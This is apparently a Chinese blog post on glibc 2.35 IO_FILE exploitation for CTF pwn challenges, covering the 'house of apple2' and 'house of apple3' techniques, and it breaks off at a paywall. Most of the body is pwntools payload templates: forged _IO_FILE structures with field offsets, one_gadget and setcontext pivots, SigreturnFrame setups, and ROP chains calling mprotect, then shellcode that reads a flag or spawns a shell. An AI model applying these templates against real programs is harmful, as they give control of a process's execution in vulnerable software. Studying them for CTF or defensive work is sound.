libc2.35时代IO利用

最新推荐文章于 2025-03-01 01:09:38 发布
原创 最新推荐文章于 2025-03-01 01:09:38 发布 · 1.2k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #前端 #linux

文章中的利用方法主要针对libc2.35,高版本可做适当修改利用。话不多说,直接开始。

house of apple系列
libc2.35后的IO利用最知名的就是house of apple了,一共三个系列文章,是roderick师傅发现并广泛利用。

house of apple2
基于IO_FILE->_wide_data的利用技巧
条件:

已知heap地址和libc地址

能控制程序执行IO操作,包括但不限于:从main函数返回、调用exit函数、通过__malloc_assert触发

能控制vtable和_wide_data,一般使用largebin attack去控制
利用_IO_wfile_overflow函数控制程序执行流:
调用链:_IO_wfile_overflow -> _IO_wdoallocbuf -> _IO_WDOALLOCATE
getshell模板

def house_of_apple2(fake_IO_file_addr):
fake_IO_file = flat(
{
0x18: 1, # _IO_write_ptr
0x58: one_gadget, # chain
0x78: _IO_stdfile_2_lock, # _lock
0x90: fake_IO_file_addr, # _IO_wide_data
0xc8: _IO_wfile_jumps, # vtable
0xd0: fake_IO_file_addr, # fake wide vtable
}, filler=‘\x00’
)

return fake_IO_file
ORW模板

def house_of_apple2(fake_IO_file_addr):
fake_IO_file = flat(
{
0x18: 1, # _IO_write_ptr
0x58: setcontext + 61, # chain
0x78: _IO_stdfile_2_lock, # _lock
0x90: fake_IO_file_addr + 0x100, # _IO_wide_data
0xc8: _IO_wfile_jumps, # vtable
0xf0: {
0xa0: [fake_IO_file_addr + 0x200, ret],
0xe0: fake_IO_file_addr
},
0x1f0: [
pop_rdi_ret, fake_IO_file_addr >> 12 << 12,
pop_rsi_ret, 0x2000,
pop_rdx_rbx_ret, 7, 0,
pop_rax_ret, 10, # mprotect
syscall_ret,
fake_IO_file_addr + 0x290
],
0x280: asm(shellcraft.cat(‘flag’))

    }, filler='\x00'
)
payload = fake_IO_file

return payload

注意: 上述模板中fake_IO_file_addr地址为伪造的_IO_FILE起始地址。

house of apple3
基于IO_FILE->_codecvt的利用方法。
条件:

已知heap地址和libc基址
能控制程序执行IO操作,包括但不限于:从main函数返回、调用exit函数、通过**__malloc_assert触发
能控制IO_FILE的vtable和_codecvt**,一般使用largebin attack去控制
利用_IO_wfile_underflow控制程序执行流
调用链:_IO_wfile_underflow -> libio_codecvt_in -> fp->codecvt -> cd_in.step -> __fct(函数指针)
_IO_wfile_underflow
__libio_codecvt_in
DL_CALL_FCT
gs = fp->_codecvt->__cd_in.step
*(gs->__fct)(gs)

getshell模板

def house_of_apple3(fake_IO_file_addr):
fake_ucontext = ucontext_t()
fake_ucontext.rip = ret
fake_ucontext.rsp = fake_IO_file_addr + 0x300
fake_ucontext.rdi = fake_IO_file_addr >> 12 << 12
fake_ucontext.rsi = 0x2000
fake_ucontext.rdx = 7

fake_IO_file = flat(
    {
        0: 0xffffffffffffffff,  # _IO_read_end
        0x18: 1,                # _IO_write_ptr
        0x30: fake_IO_file_addr + 0x100,    # _IO_buf_end = _codecvt.step
        0x88: fake_IO_file_addr + 0x40,     # _codecvt
        0x90: _IO_wide_data,
        0xc8: _IO_wfile_jumps + 0x8,        # vtable
        0xf0: {
            0: 0,   # key
            0x28: one_gadget,     # fun_ptr
        }
    }, filler='\x00'
)

payload = fake_IO_file
return payload

ORW模板
magic gadget: libc2.36及以上版本被去除

<getkeyserv_handle+576>

mov rdx, qword ptr [rdi + 8];
mov qword ptr [rsp], rax;
call qword ptr [rdx + 0x20]
def house_of_apple3(fake_IO_file_addr):
frame = SigreturnFrame()
frame.rip = ret
frame.rsp = fake_IO_file_addr + 0x200
frame.rdi = fake_IO_file_addr >> 12 << 12
frame.rsi = 0x2000
frame.rdx = 7

fake_IO_file = flat(
    {
        0: 0xffffffffffffffff,  # _IO_read_end
        0x18: 1,                # _IO_write_ptr
        0x30: fake_IO_file_addr + 0x100,    # _IO_buf_end = _codecvt.step
        0x88: fake_IO_file_addr + 0x40,     # _codecvt
        0x90: _IO_wide_data,
        0xc8: _IO_wfile_jumps + 0x8,        # vtable
        0xf0: {
            0: 0,   # key
            0x8: fake_IO_file_addr + 0x100,
            0x20: setcontext + 61,
            0x28: magic_gadget,     # fun_ptr
            0x30: bytes(frame)[0x30:]
        },
        0x1f0: [
            pop_rax_ret, 10,
            syscall_ret,
            fake_IO_file_addr + 0x230
        ],
        0x220: asm(shellcraft.cat('flag'))
    }, filler='\x00'
)

payload = fake_IO_file
return payload

可以结合国资社畜师傅提出的house of 一骑当千达到无条件ORW。

class ucontext_t:
‘’’
[0x1c0] must be NULL.
‘’’
length = 0x1c8
bin_str = length * b’\0’
rip = 0
rsp = 0
rbx = 0
rbp = 0
r12 = 0
r13 = 0
r14 = 0
r15 = 0
rsi = 0
rdi = 0

最低0.47元/天 解锁文章

200万优质内容无限畅学
Ubuntu20.04更新GLIBC2.35版本
flysnow010的博客
07-03 7394
Ubuntu20.04默认GLIBC库版本是2.31.今天碰到一个软件需要2.35版本的GLIBC。需要升级到2.35版本。
House of apple 一种新的glibcIO攻击方法
pythonxxoo的博客
06-18 3087
目录* House of apple 一种新的glibcIO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
关于glibc-all-in-one下载libc2.35以上报错问题
2302_79899078的博客
06-18 474
xclibc -x ./pwn ./libc-版本。下载2.35时报错:原因是缺少解压工具zstd。xclibc -c libc版本。下载后重新输命令就可以了。附加xclibc命令。
house of apple1
m0_63437215的博客
11-16 790
house of apple1
house of apple2(改进)
m0_63437215的博客
11-18 1582
house_of_apple2
重学IO利用_IO_2_1_stdout泄露libc
2301_79327647的博客
08-19 1090
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35
pwn 堆入门之tcache
清霂的博客
05-13 636
目录ciscn_final_3ciscn_2019_es_1 ciscn_final_3 #!/usr/bin/env python3 # coding=utf-8 from pwn import * arch = "amd64" filename = "ciscn_final_3" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) # libc l
在Ubuntu 22.04系统中,如何利用largebinattack和houseofapple技术针对glibc 2.35版本进行漏洞攻击?
11-02
要有效地利用largebinattack和houseofapple技术对glibc 2.35版本进行漏洞攻击,首先需要深刻理解glibc中largebin的内存分配机制以及新增的安全检查点。在Ubuntu 22.04系统上,glibc的版本升级到2.35,引入了对large...
深入理解 House of Cat
红叶的博客
05-16 1360
exit() --> __run_exit_handlers --> _IO_cleanup --> _IO_flush_all_lockp --> _IO_wfile_seekoff --> _IO_switch_to_wget_mode --> _IO_switch_to_wget_mode 的 call rax。当RCX为0时,程序进入了这段 if 语句。_wide_data 指向的 _IO_FILE 结构体的 _IO_write_ptr 必须大于 _IO_write_base,mode 大于0。
探究高版本glibc(2.37)下对house of apple2利用(1)
qq_62172019的博客
05-19 776
探究apple2在高版本glibc的可行性
glibc 2.35 pwn——house of apple v2 示例程序
CoLin的pwn小屋
03-18 918
house of apple v2 演示程序
浅析house_of_apple2(下)
2301_79327647的博客
08-08 1008
''''''pause()delete(1)show(0)#恢复原样show(0)show(0)#恢复原样})ret0,##pop r12;
glibc 2.35 pwn——house of apple v1 示例程序
CoLin的pwn小屋
01-11 1138
house of apple v1示例程序
CTF-PWN-堆-【house of apple1】
llovewuzhengzi的博客
03-02 1688
IO_flush_all_lockp在清理时会检查_IO_list_all链表(这是glibc所管理的全局FILE流链表),并对每个FILE对象应用相应的操作,如果满足条件(例如流正在写入模式并且有未冲洗的数据),则会调用vtable中_overflow函数指针所指向的函数。这些手动打开的文件流,连同标准输出和标准错误,构成了程序的“所有打开的输出流”。正常终止过程中,会发生一系列的清理工作,例如关闭所有打开的流(尤其是标准I/O流)来确保数据不会丢失,并且所有缓冲的输出都被写入它们对应的文件或设备中。
house of apple2和house of cat的利用总结
2301_79327647的博客
08-15 900
最近感觉apple2和cat有些利用条件搞混了,就想出一篇博客总结一下。
买不起的大house之house of apple1
最新发布
XiDPPython的博客
03-01 891
在高版本的glibc中逐渐移除了等一众hook全局变量,这意味着在CTF竞赛中利用“hook”来控制程序流成为了过去式。而想要在高版本利用成功,基本上就离不开对IO_FILE结构体的伪造与IO流的攻击下面介绍一种由roderick01师傅发现的链子称之为而一共有三条链子本文将介绍apple1stderr。
Largebin attack & house of cat
qq_42220888的博客
07-12 381
largebin attack house of cat
glibc 2.35 pwn——house of emma示例程序
CoLin的pwn小屋
08-18 1975
house of emma示例程序
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
a2590035252的博客
09-30 1286
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值